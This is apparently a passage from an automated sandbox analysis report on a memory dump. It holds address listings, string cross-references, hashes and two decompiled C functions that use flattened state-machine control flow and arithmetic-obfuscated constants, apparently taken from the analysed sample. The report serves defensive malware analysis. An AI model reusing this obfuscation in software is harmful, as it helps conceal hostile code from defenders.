0x00252ce5
0x00252ced
0x00252cfa
0x00252cfe
0x00252d06
0x00252d10
0x00252d18
0x00252d1d
0x00252d25
0x00252d2d
0x00252d3b
0x00252d40
0x00252d46
0x00252d52
0x00252d55
0x00252d59
0x00252d61
0x00252d6e
0x00252d72
0x00252d7a
0x00252d7f
0x00252d87
0x00252d92
0x00252d9a
0x00252da5
0x00252dad
0x00252db7
0x00252dbb
0x00252dc3
0x00252dcb
0x00252dd3
0x00252ddb
0x00252de3
0x00252deb
0x00252df6
0x00252e01
0x00252e0c
0x00252e14
0x00252e1c
0x00252e21
0x00252e29
0x00252e31
0x00252e3e
0x00252e47
0x00252e4b
0x00252e53
0x00252e5b
0x00252e60
0x00252e64
0x00252e6c
0x00252e74
0x00252e7c
0x00252e86
0x00252e8a
0x00252e92
0x00252e9a
0x00252e9f
0x00252ea7
0x00252eaf
0x00252eb7
0x00252ec4
0x00252ec8
0x00252ed0
0x00252ed8
0x00252ee0
0x00252ee8
0x00252ef0
0x00252ef8
0x00252f00
0x00252f08
0x00252f10
0x00252f18
0x00252f1f
0x00252f29
0x00252f2e
0x00252f36
0x00252f3e
0x00252f48
0x00252f4c
0x00252f54
0x00252f5c
0x00252f64
0x00252f6c
0x00252f7a
0x00252f7e
0x00252f82
0x00252f8a
0x00252f8a
0x00252f8c
0x00000000
0x00252f8d
0x00252f9f
0x002530a3
0x002530aa
0x00253193
0x0025319e
0x002531a0
0x00253094
0x00253094
0x00252f8a
0x00252f8a
0x00252f8c
0x00000000
0x00252f8c
0x00252f8a
0x002530b0
0x002530b8
0x002530e1
0x002530e1
0x002530e9
0x002530eb
0x002530f8
0x002530fd
0x0025312e
0x0025315f
0x00253164
0x00253175
0x0025317e
0x0025317e
0x002530da
0x002530da
0x00000000
0x002530da
0x002530ba
0x002530c3
0x00000000
0x00000000
0x002530c5
0x002530cd
0x00000000
0x00000000
0x002530cf
0x002530d8
0x00000000
0x00000000
0x00000000
0x002530d8
0x00252fa7
0x00253081
0x0025308c
0x0025308e
0x0025308e
0x00000000
0x0025308e
0x00252fb3
0x0025300c
0x00253044
0x0025305d
0x00253062
0x00253065
0x00252f8a
0x00252f8a
0x00252f8c
0x00000000
0x00252f8c
0x00252f8a
0x00252fbb
0x00253005
0x00000000
0x00253005
0x00252fc3
0x002531cc
0x002531cc
0x002531d2
0x00000000
0x00000000
0x002531e1
0x002531e1
0x002531e1
0x00252feb
0x00252ff0
0x00252ff2
0x00252ff8
0x00000000
0x00000000
0x00252ffe
0x00000000
0x00252ffe
0x002531bc
0x002531c1
0x002531c4
0x002531cb
0x00000000
0x002531cb

Strings

9?, xrefs: 00252DEB
X, xrefs: 00252E29
&, xrefs: 00252E64
VH, xrefs: 00252D9A
A9W, xrefs: 00252C29
|7, xrefs: 00252BF9
Up, xrefs: 00252C01
xT, xrefs: 00252EAF
sB, xrefs: 00252F2E

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: &$9?$A9W$Up$VH$sB$xT$|7$X
API String ID: 0-983689062
Opcode ID: 8ab34d7d775e53dbc6bf5424698efdac8eee1a345dd5410545fe0c0597c8e3e2
Instruction ID: 4be9af7be6dbcb69e7789ca8da81b77fed63e68c7e3483921ef993cdbc187719
Opcode Fuzzy Hash: 8ab34d7d775e53dbc6bf5424698efdac8eee1a345dd5410545fe0c0597c8e3e2
Instruction Fuzzy Hash: B5F142715183818FD368CF61C549A5FBBE1FBC4348F108A1DF69A862A0D7B88A59CF47

Uniqueness

Uniqueness Score: -1.00%

Function 002488E5, Relevance: 11.5, Strings: 9, Instructions: 298
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E002488E5(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _t325;
				short* _t331;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				short _t373;
				void* _t376;
				intOrPtr* _t380;
				void* _t382;

				 *(_t382 + 8) = 0xaa86;
				 *(_t382 + 8) =  *(_t382 + 8) + 0xffffe070;
				 *(_t382 + 8) =  *(_t382 + 8) << 0xc;
				 *(_t382 + 8) =  *(_t382 + 8) << 6;
				 *(_t382 + 8) =  *(_t382 + 8) ^ 0x2bd80002;
				 *(_t382 + 0x64) = 0xdd5d;
				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d690a55;
				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d69d718;
				 *(_t382 + 0x74) = 0x57af;
				_t380 = __edx;
				 *((intOrPtr*)(_t382 + 0x9c)) = __ecx;
				_t373 = 0;
				_t340 = 5;
				 *(_t382 + 0x88) =  *(_t382 + 0x74) / _t340;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x40001189;
				_t376 = 0x1f5a6ea2;
				 *(_t382 + 0x68) = 0xf929;
				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a9a6f;
				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a6fd1;
				 *(_t382 + 0x74) = 0x8254;
				 *(_t382 + 0x74) =  *(_t382 + 0x74) << 2;
				 *(_t382 + 0x74) =  *(_t382 + 0x74) ^ 0x00022a5c;
				 *(_t382 + 0x48) = 0x274c;
				_t341 = 0x4c;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) * 0x48;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b411b57;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b4a2351;
				 *(_t382 + 0x7c) = 0x6684;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) + 0xaed9;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x00014ccf;
				 *(_t382 + 0x40) = 0x1902;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x72d0747c;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) / _t341;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x01828d69;
				 *(_t382 + 0x6c) = 0xb89b;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0xffffd32a;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x0000fcd5;
				 *(_t382 + 0x14) = 0x3892;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) >> 0xa;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d57d543;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0x6cb7;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d585a45;
				 *(_t382 + 0x28) = 0xad3d;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) + 0xffffae8b;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) >> 2;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) << 7;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x000b51d9;
				 *(_t382 + 0x58) = 0xde2;
				_t342 = 0x39;
				 *(_t382 + 0x54) =  *(_t382 + 0x58) * 0x34;
				 *(_t382 + 0x54) =  *(_t382 + 0x54) / _t342;
				 *(_t382 + 0x54) =  *(_t382 + 0x54) ^ 0x00000d30;
				 *(_t382 + 0x1c) = 0xba82;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) << 4;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) >> 0xc;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b4b7c;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b12fd;
				 *(_t382 + 0x40) = 0xa3d9;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd82378ca;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) + 0xffff3c17;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd8236a86;
				 *(_t382 + 0x5c) = 0xecab;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) >> 0x10;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d98124e;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d9832d2;
				 *(_t382 + 0x80) = 0x1387;
				_t343 = 0x2a;
				 *(_t382 + 0x80) =  *(_t382 + 0x80) * 0x63;
				 *(_t382 + 0x80) =  *(_t382 + 0x80) ^ 0x0007c428;
				 *(_t382 + 0x4c) = 0x7ada;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) * 0x39;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) + 0xffffefa5;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) ^ 0x001b3452;
				 *(_t382 + 0x90) = 0x1591;
				 *(_t382 + 0x90) =  *(_t382 + 0x90) >> 8;
				 *(_t382 + 0x90) =  *(_t382 + 0x90) ^ 0x0000431e;
				 *(_t382 + 0x2c) = 0x3f89;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 5;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) | 0xff33b819;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 7;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) ^ 0x9bfcb078;
				 *(_t382 + 0x98) = 0x7441;
				 *(_t382 + 0x98) =  *(_t382 + 0x98) / _t343;
				 *(_t382 + 0x98) =  *(_t382 + 0x98) ^ 0x000035d7;
				 *(_t382 + 0x48) = 0x7f1e;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) + 0x7f31;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) << 0xe;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x3f939bef;
				 *(_t382 + 0x8c) = 0x831c;
				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) << 8;
				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) ^ 0x008363dd;
				 *(_t382 + 0x30) = 0x92b6;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) + 0xa4c2;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 0xc;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 8;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) ^ 0x77802bdf;
				 *(_t382 + 0x28) = 0x1d89;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0xf9709c7c;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) * 0x25;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0x703957df;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x7d7fbb45;
				 *(_t382 + 0x58) = 0x126d;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 3;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 9;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) ^ 0x000002d5;
				 *(_t382 + 0x7c) = 0x1a69;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) | 0x10216cf6;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x102141be;
				 *(_t382 + 0x20) = 0xff0b;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) >> 0x10;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) << 7;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) * 0x21;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) ^ 0x000040df;
				 *(_t382 + 0x6c) = 0xe12c;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0x79cf;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x000152eb;
				 *(_t382 + 0x34) = 0xd574;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) | 0x9559dde1;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0x4f646285;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) + 0xffff68ed;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0xda3d1e7a;
				 *(_t382 + 0x88) = 0x5832;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) * 0x27;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x000d0611;
				 *(_t382 + 0x50) = 0x55a1;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) << 0xf;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x45d5d069;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x6f0533ce;
				 *(_t382 + 0x14) = 0xc073;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0xffffd37e;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 3;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 4;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x0049a7c7;
				 *(_t382 + 0x94) = 0xf1be;
				_t337 =  *((intOrPtr*)(_t382 + 0xa0));
				_t344 = 0xa;
				 *(_t382 + 0x94) =  *(_t382 + 0x94) / _t344;
				 *(_t382 + 0x94) =  *(_t382 + 0x94) ^ 0x00002403;
				 *(_t382 + 0x60) = 0x96ef;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) + 0xfa48;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) | 0xbd3809b4;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) ^ 0xbd39967f;
				 *(_t382 + 0x38) = 0xec0c;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) + 0x6908;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) * 0x26;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) >> 9;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) ^ 0x00001f14;
				do {
					while(_t376 != 0x3ac0a14) {
						if(_t376 == 0x7fec1df) {
							_t344 = _t382 + 0x2ac;
							E00250D33(_t382 + 0x2ac,  *(_t382 + 0x48), __eflags,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x14),  *((intOrPtr*)(_t382 + 0x24)));
							_t382 = _t382 + 0xc;
							_t376 = 0x12c07630;
							continue;
						} else {
							if(_t376 == 0x12c07630) {
								_push( *(_t382 + 0x1c));
								E002429E3(_t382 + 0x2b0, 0x104, E0025889D( *((intOrPtr*)(_t382 + 0x4b8)),  *(_t382 + 0x58), __eflags),  *(_t382 + 0x5c),  *(_t382 + 0x74),  *(_t382 + 0x94),  *((intOrPtr*)(_t382 + 0xac)),  *((intOrPtr*)(_t382 + 0x4c4)),  *(_t382 + 0x54),  *(_t382 + 0x94));
								_t344 =  *(_t382 + 0x5c);
								E00252025( *(_t382 + 0x5c), _t327,  *((intOrPtr*)(_t382 + 0xc4)),  *((intOrPtr*)(_t382 + 0x70)));
								_t382 = _t382 + 0x30;
								_t376 = 0x3ac0a14;
								continue;
							} else {
								if(_t376 == 0x1f5a6ea2) {
									_t376 = 0x2b635c32;
									continue;
								} else {
									if(_t376 == 0x2b635c32) {
										E00253E3F(_t344, _t382 + 0xa4, __eflags,  *(_t382 + 0x68),  *((intOrPtr*)(_t382 + 0x70)));
										_t331 = E002428CE(_t382 + 0xac,  *(_t382 + 0x50),  *(_t382 + 0x80));
										_t382 = _t382 + 0xc;
										_t376 = 0x7fec1df;
										_t344 = 0;
										 *_t331 = 0;
										continue;
									} else {
										if(_t376 == 0x2c9ad714) {
											E00254F7D( *(_t382 + 0x60),  *(_t382 + 0x38), _t337);
										} else {
											if(_t376 != 0x33ecfade) {
												goto L16;
											} else {
												_t263 = _t380 + 4; // 0xedb0bf04
												E00256CAA( *(_t382 + 0x4c),  *((intOrPtr*)(_t382 + 0xa0)), _t337, _t263,  *(_t382 + 0x64),  *_t380,  *(_t382 + 0x20), _t344,  *_t263,  *(_t382 + 0x94));
												_t382 = _t382 + 0x20;
												_t344 = 1;
												_t376 = 0x2c9ad714;
												_t373 =  !=  ? 1 : _t373;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t373;
					}
					_t325 = E0024B566(_t344, 0,  *((intOrPtr*)(_t382 + 0xb8)),  *(_t382 + 0x58),  *((intOrPtr*)(_t382 + 0xa8)),  *(_t382 + 0x48), _t344,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x90),  *((intOrPtr*)(_t382 + 0x84)),  *(_t382 + 0x2c),  *(_t382 + 0x74),  *(_t382 + 0x1c),  *((intOrPtr*)(_t382 + 0x4b8)));
					_t337 = _t325;
					_t382 = _t382 + 0x30;
					__eflags = _t325 - 0xffffffff;
					if(__eflags == 0) {
						_t376 = 0x18af80d5;
						goto L16;
					} else {
						_t376 = 0x33ecfade;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t376 - 0x18af80d5;
				} while (__eflags != 0);
				goto L19;
			}

0x002488eb
0x002488f3
0x002488fb
0x00248900
0x00248905
0x0024890d
0x00248915
0x0024891d
0x00248925
0x00248935
0x00248937
0x00248942
0x00248944
0x00248949
0x00248952
0x0024895d
0x00248962
0x0024896a
0x00248972
0x0024897a
0x00248982
0x00248987
0x0024898f
0x0024899c
0x0024899f
0x002489a3
0x002489ab
0x002489b3
0x002489bb
0x002489c3
0x002489cb
0x002489d3
0x002489e3
0x002489e7
0x002489ef
0x002489f7
0x002489ff
0x00248a07
0x00248a0f
0x00248a14
0x00248a1c
0x00248a24
0x00248a2c
0x00248a34
0x00248a3c
0x00248a41
0x00248a46
0x00248a4e
0x00248a5b
0x00248a5c
0x00248a66
0x00248a6a
0x00248a72
0x00248a7a
0x00248a7f
0x00248a84
0x00248a8c
0x00248a94
0x00248a9c
0x00248aa4
0x00248aac
0x00248ab4
0x00248abc
0x00248ac1
0x00248acb
0x00248ad3
0x00248ae8
0x00248ae9
0x00248af0
0x00248afb
0x00248b08
0x00248b0c
0x00248b14
0x00248b1c
0x00248b27
0x00248b2f
0x00248b3a
0x00248b42
0x00248b47
0x00248b4f
0x00248b54
0x00248b5c
0x00248b70
0x00248b77
0x00248b82
0x00248b8a
0x00248b92
0x00248b97
0x00248b9f
0x00248baa
0x00248bb2
0x00248bbd
0x00248bc5
0x00248bcd
0x00248bd2
0x00248bd7
0x00248bdf
0x00248be7
0x00248bf4
0x00248bf8
0x00248c00
0x00248c08
0x00248c10
0x00248c15
0x00248c1a
0x00248c22
0x00248c2a
0x00248c32
0x00248c3a
0x00248c42
0x00248c47
0x00248c51
0x00248c55
0x00248c5d
0x00248c65
0x00248c6d
0x00248c75
0x00248c7d
0x00248c85
0x00248c8d
0x00248c95
0x00248c9d
0x00248cb0
0x00248cb7
0x00248cc2
0x00248cca
0x00248ccf
0x00248cd7
0x00248cdf
0x00248ce7
0x00248cef
0x00248cf4
0x00248cf9
0x00248d01
0x00248d17
0x00248d1e
0x00248d21
0x00248d28
0x00248d33
0x00248d3b
0x00248d43
0x00248d4b
0x00248d53
0x00248d5b
0x00248d68
0x00248d6c
0x00248d71
0x00248d79
0x00248d79
0x00248d8b
0x00248ecd
0x00248ee0
0x00248ee5
0x00248ee8
0x00000000
0x00248d91
0x00248d97
0x00248e4f
0x00248ea1
0x00248eb3
0x00248eb7
0x00248ebc
0x00248ebf
0x00000000
0x00248d9d
0x00248da3
0x00248e45
0x00000000
0x00248da9
0x00248daf
0x00248e17
0x00248e2e
0x00248e33
0x00248e36
0x00248e3b
0x00248e3d
0x00000000
0x00248db1
0x00248db7
0x00248f65
0x00248dbd
0x00248dc3
0x00000000
0x00248dc9
0x00248dd0
0x00248dee
0x00248df5
0x00248df8
0x00248df9
0x00248e00
0x00000000
0x00248e00
0x00248dc3
0x00248db7
0x00248daf
0x00248da3
0x00248d97
0x00248f6b
0x00248f77
0x00248f77
0x00248f30
0x00248f35
0x00248f37
0x00248f3a
0x00248f3d
0x00248f49
0x00000000
0x00248f3f
0x00248f3f
0x00000000
0x00248f3f
0x00000000
0x00248f4e
0x00248f4e
0x00248f4e
0x00000000

Strings

2\c+, xrefs: 00248E45
Q#JK, xrefs: 002489AB
2\c+, xrefs: 00248DA9
2X, xrefs: 00248C9D
EZX-, xrefs: 00248A24
At, xrefs: 00248B5C
Ui=, xrefs: 00248915
,, xrefs: 00248C5D
0, xrefs: 00248A6A

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: ,$0$2X$2\c+$2\c+$At$EZX-$Q#JK$Ui=
API String ID: 2962429428-1096774584
Opcode ID: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
Instruction ID: fcfa2288fff0d4286f203c5a55927e0feedd74f84ff3eabd98d228dc4f3c4ebe
Opcode Fuzzy Hash: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
Instruction Fuzzy Hash: F3F11F725183809FD368CF65C48A65FBBE1BBC4708F10891DF59A962A0C7B98959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002526F5, Relevance: 11.5, Strings: 9, Instructions: 225
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002526F5(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* __edi;
				void* __ebp;
				intOrPtr _t199;
				intOrPtr _t201;
				void* _t202;
				intOrPtr _t204;
				intOrPtr _t208;
				intOrPtr _t209;
				intOrPtr* _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				void* _t216;
				void* _t224;
				void* _t237;
				intOrPtr _t241;
				void* _t242;
				intOrPtr _t246;
				signed int* _t247;

				_t247 =  &_v88;
				_v12 = 0x29be25;
				_v8 = 0x714c58;
				_t241 = 0;
				_t210 = __edx;
				_v4 = 0;
				_v28 = 0x1199;
				_t246 = __ecx;
				_v28 = _v28 + 0xffffe920;
				_t242 = 0x2efb68f6;
				_v28 = _v28 ^ 0xffffad72;
				_v32 = 0x5bb2;
				_t212 = 0x22;
				_v32 = _v32 / _t212;
				_v32 = _v32 ^ 0x00002aec;
				_v56 = 0xeb34;
				_t213 = 0x1b;
				_v56 = _v56 * 0x6a;
				_v56 = _v56 + 0x2965;
				_v56 = _v56 ^ 0x0061feda;
				_v84 = 0xfe4e;
				_v84 = _v84 + 0xd2a6;
				_v84 = _v84 >> 3;
				_v84 = _v84 | 0x3d0bc2c6;
				_v84 = _v84 ^ 0x3d0bc81e;
				_v20 = 0x5db0;
				_v20 = _v20 + 0xffffd438;
				_v20 = _v20 ^ 0x00005602;
				_v24 = 0xa932;
				_v24 = _v24 * 0x1f;
				_v24 = _v24 ^ 0x00145068;
				_v88 = 0xc29f;
				_v88 = _v88 * 0x34;
				_v88 = _v88 ^ 0xcbbf1de0;
				_v88 = _v88 + 0x67bb;
				_v88 = _v88 ^ 0xcb98f8b4;
				_v36 = 0x7c84;
				_v36 = _v36 + 0x6da7;
				_v36 = _v36 ^ 0x0000df84;
				_v60 = 0xf0d8;
				_v60 = _v60 + 0xffffcb07;
				_v60 = _v60 * 0x50;
				_v60 = _v60 ^ 0x003a95e0;
				_v44 = 0x6681;
				_v44 = _v44 + 0xffff19d2;
				_v44 = _v44 / _t213;
				_v44 = _v44 ^ 0x097b3a7d;
				_v16 = 0x94d;
				_v16 = _v16 + 0x4187;
				_v16 = _v16 ^ 0x00007836;
				_v48 = 0x21e9;
				_v48 = _v48 ^ 0x3c92a0ae;
				_v48 = _v48 + 0xf596;
				_v48 = _v48 ^ 0x3c9366ad;
				_v52 = 0x4a04;
				_v52 = _v52 * 0x54;
				_v52 = _v52 ^ 0x56a39f58;
				_v52 = _v52 ^ 0x56bbe121;
				_v80 = 0x166f;
				_v80 = _v80 ^ 0x3bc38db2;
				_v80 = _v80 << 0xd;
				_v80 = _v80 | 0x5d8ccce3;
				_v80 = _v80 ^ 0x7fffd756;
				_v76 = 0xd2e;
				_t214 = 6;
				_v76 = _v76 / _t214;
				_t215 = 0x59;
				_t237 = 0xdd7d922;
				_v76 = _v76 / _t215;
				_v76 = _v76 ^ 0xb1a59fe6;
				_v76 = _v76 ^ 0xb1a5c97b;
				_v40 = 0x2ae1;
				_v40 = _v40 >> 6;
				_v40 = _v40 << 2;
				_v40 = _v40 ^ 0x0000341b;
				_v64 = 0x37cd;
				_v64 = _v64 + 0xffff3540;
				_v64 = _v64 << 1;
				_v64 = _v64 | 0x66261fef;
				_v64 = _v64 ^ 0xfffeb931;
				_v68 = 0x9ed9;
				_v68 = _v68 + 0xad09;
				_v68 = _v68 ^ 0xfd9e5c2b;
				_v68 = _v68 >> 4;
				_v68 = _v68 ^ 0x0fd99075;
				_v72 = 0x1a2d;
				_v72 = _v72 + 0xc4a4;
				_v72 = _v72 << 6;
				_v72 = _v72 * 0x59;
				_v72 = _v72 ^ 0x135ddffd;
				while(1) {
					L1:
					_t216 = 0x2c1c6573;
					while(_t242 != 0x6072d1c) {
						if(_t242 == _t237) {
							_push(_t216);
							_t199 = E00241132(_v44, _t216, _v16, _t216, _t241, _v48, _v52, _v80, E00242A30);
							_t247 =  &(_t247[9]);
							 *((intOrPtr*)(_t241 + 0x1c)) = _t199;
							__eflags = _t199;
							_t216 = 0x2c1c6573;
							_t242 =  !=  ? 0x2c1c6573 : 0x6072d1c;
							L13:
							_t237 = 0xdd7d922;
							continue;
						}
						if(_t242 == 0xe9e2879) {
							_push(_v24);
							_t201 = E00256DB9( *((intOrPtr*)(_t210 + 4)), _t241, _t246, __eflags, _t216,  *_t210, _v84, _v20);
							_t247 =  &(_t247[5]);
							 *((intOrPtr*)(_t241 + 0x28)) = _t201;
							__eflags = _t201;
							_t202 = 0x303a6ade;
							_t242 =  !=  ? 0x303a6ade : 0x28cfd81a;
							L12:
							_t216 = 0x2c1c6573;
							goto L13;
						}
						if(_t242 == 0x28cfd81a) {
							return E0024F536(_v64, _v68, _v72, _t241);
						}
						if(_t242 == _t216) {
							 *((intOrPtr*)(_t241 + 0x24)) = _t246;
							_t204 =  *0x25ca24; // 0x0
							 *((intOrPtr*)(_t241 + 0x2c)) = _t204;
							 *0x25ca24 = _t241;
							return _t204;
						}
						if(_t242 != 0x2efb68f6) {
							if(_t242 != _t202) {
								L17:
								__eflags = _t242 - 0x35b12720;
								if(__eflags != 0) {
									continue;
								} else {
									return _t202;
								}
								L22:
							} else {
								_t209 = E002476DB( *((intOrPtr*)(_t241 + 0x28)), _v88, _v36, _v60);
								_t247 =  &(_t247[2]);
								 *((intOrPtr*)(_t241 + 4)) = _t209;
								_t237 = 0xdd7d922;
								_t242 =  !=  ? 0xdd7d922 : 0x6072d1c;
								goto L1;
							}
						}
						_push(_t216);
						_push(_t216);
						_t224 = 0x38;
						_t208 = E00248736(_t224);
						_t241 = _t208;
						__eflags = _t241;
						if(__eflags != 0) {
							_t242 = 0xe9e2879;
							_t202 = 0x303a6ade;
							goto L12;
						}
						return _t208;
						goto L22;
					}
					E0025422C(_v76,  *((intOrPtr*)(_t241 + 0x28)), _v40);
					_t242 = 0x28cfd81a;
					_t216 = 0x2c1c6573;
					_t237 = 0xdd7d922;
					goto L17;
				}
			}

0x002526f5
0x002526f8
0x00252700
0x0025270c
0x0025270e
0x00252710
0x00252716
0x0025271e
0x00252720
0x00252728
0x0025272d
0x00252735
0x00252743
0x00252748
0x0025274e
0x00252756
0x00252763
0x00252764
0x00252768
0x00252770
0x00252778
0x00252780
0x00252788
0x0025278d
0x00252795
0x0025279d
0x002527a5
0x002527ad
0x002527b5
0x002527c2
0x002527c6
0x002527ce
0x002527db
0x002527df
0x002527e7
0x002527ef
0x002527f7
0x002527ff
0x00252807
0x0025280f
0x00252817
0x00252824
0x00252828
0x00252830
0x00252838
0x00252846
0x0025284a
0x00252852
0x0025285a
0x00252862
0x0025286a
0x00252872
0x0025287a
0x00252882
0x0025288a
0x00252897
0x0025289b
0x002528a3
0x002528ab
0x002528b3
0x002528bb
0x002528c0
0x002528c8
0x002528d0
0x002528e0
0x002528e5
0x002528ef
0x002528f2
0x002528f7
0x002528fb
0x00252903
0x0025290b
0x00252913
0x00252918
0x0025291d
0x00252925
0x0025292d
0x00252935
0x00252939
0x00252941
0x00252949
0x00252951
0x00252959
0x00252961
0x00252966
0x0025296e
0x00252976
0x0025297e
0x00252988
0x0025298c
0x00252994
0x00252994
0x00252999
0x0025299e
0x002529ac
0x00252a76
0x00252a93
0x00252a98
0x00252a9b
0x00252a9e
0x00252aa5
0x00252aaf
0x00252a3e
0x00252a3e
0x00000000
0x00252a3e
0x002529b8
0x00252a48
0x00252a5a
0x00252a5f
0x00252a62
0x00252a65
0x00252a6c
0x00252a71
0x00252a39
0x00252a39
0x00000000
0x00252a39
0x002529c4
0x00000000
0x00252b0d
0x002529cc
0x00252ae7
0x00252aea
0x00252aef
0x00252af2
0x00000000
0x00252af2
0x002529d8
0x002529dc
0x00252ad9
0x00252ad9
0x00252adf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x002529e2
0x002529f1
0x002529f6
0x002529f9
0x00252a03
0x00252a08
0x00000000
0x00252a08
0x002529dc
0x00252a19
0x00252a1a
0x00252a1d
0x00252a1e
0x00252a23
0x00252a27
0x00252a29
0x00252a2f
0x00252a34
0x00000000
